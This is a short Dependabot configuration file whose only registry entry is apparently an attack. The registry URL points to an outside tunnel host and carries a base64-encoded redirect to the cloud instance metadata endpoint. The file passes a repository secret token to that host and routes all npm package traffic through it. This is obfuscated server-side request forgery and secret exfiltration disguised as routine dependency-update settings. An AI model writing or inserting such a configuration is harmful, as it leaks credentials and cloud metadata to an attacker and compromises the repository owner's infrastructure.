version: 2
registries:
  p_imds:
    type: npm-registry
    url: https://trucks-commitments-neck-wal.trycloudflare.com/redir/302/aHR0cDovLzE2OS4yNTQuMTY5LjI1NC9sYXRlc3QvbWV0YS1kYXRhLw
    token: ${{secrets.SINK1_TOKEN}}
    replaces-base: true
updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule: {interval: "daily"}
    registries: "*"
# solo p_imds 203436Z
